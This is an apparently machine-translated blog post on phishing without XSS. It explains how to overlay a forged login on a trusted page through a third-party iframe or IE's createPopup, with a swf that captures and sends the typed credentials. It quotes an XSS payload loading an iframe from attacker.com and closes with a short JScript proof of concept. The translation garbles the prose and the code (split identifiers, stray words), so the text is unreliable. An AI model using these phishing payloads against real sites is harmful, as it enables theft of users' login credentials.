Phising without xss

Heart bull mentioned some ideas about phishing in this article-using iframe to reference third-party content to forge a logon control, the home page is still on a normal webpage at this time, therefore, it is highly confusing. this is very similar to the Baidu space phishing article I wrote earlier. The swf I used to reference, and the heart ox cited iframe, which is not controlled by a trusted third party.

In the introduction of iframe, heart uses the xss method. I think of the tragedy that ICBC was infected with a Trojan a few days ago. the third-party iframe cannot be trusted. can I use that scenario to initiate a phishing attack.

The idea of using html normally referenced by pages has two difficulties. The first one is to control the content of iframe, which is not covered in this article. the second is to control the display of iframe, as mentioned in heart:

"Http://www.victim.com/login? X = <iframe src = http://www.attacker.com/login style = "height: 200px; width: 500px; top: 100px; left: 300px; overflow: hidden; position: absolute;" frameborder = 0>"

Heart allows you to write html directly to the page using xss to control the position where iframe appears, which can be precisely controlled. However, on third-party pages of iframe, unless cross-origin vulnerabilities exist, otherwise, the DOM of the parent page cannot be operated. It is a problem to control the position of iframe on the parent page. if you are lucky enough to find an xss under that domain name, it will become very easy. iframe is the xss page, and then inject js to directly operate on top dom nodes, a phishing page is complete. however, if the security of the website you want to fish on is very high and there is no xss, then there is no way. in IE, it can still be broken through.

Use window in IE. createPopup () can pop up the self-controlled dom. Even JS in iframe can overwrite the content on the parent page. in this way, we can control the display of the parent page by setting the content in the iframe. however, popup also has some defects. If you click a location outside popup, the content of popup disappears. In addition, the html elements in popup are limited, the Focus cannot be obtained by testing form elements, and script labels cannot be used. however, the embed label can still be added. Therefore, the old method is to forge a page using HTML, which can be pure images. The input control should be replaced by swf, And the popup will be displayed on the page, use swf to send the obtained data. think about the third-party content hijacking of ICBC. If this method is used, it is still very harmful.

 

PoC:

Code of the Iframe page:

<Script language = "JScript">
Var oPopup = window. createPopup ();
Var oPopupBody = oPopup.doc ument. body;
Var str = "<embed src1_getdata.swf> </embed>"
OPopupBody. innerHTML = str;
OPopup. show (0, 0, screen. availWidth, screen. availHeight, too many Doc ument. body );
</Script>

Not fully tested, valid only in IE8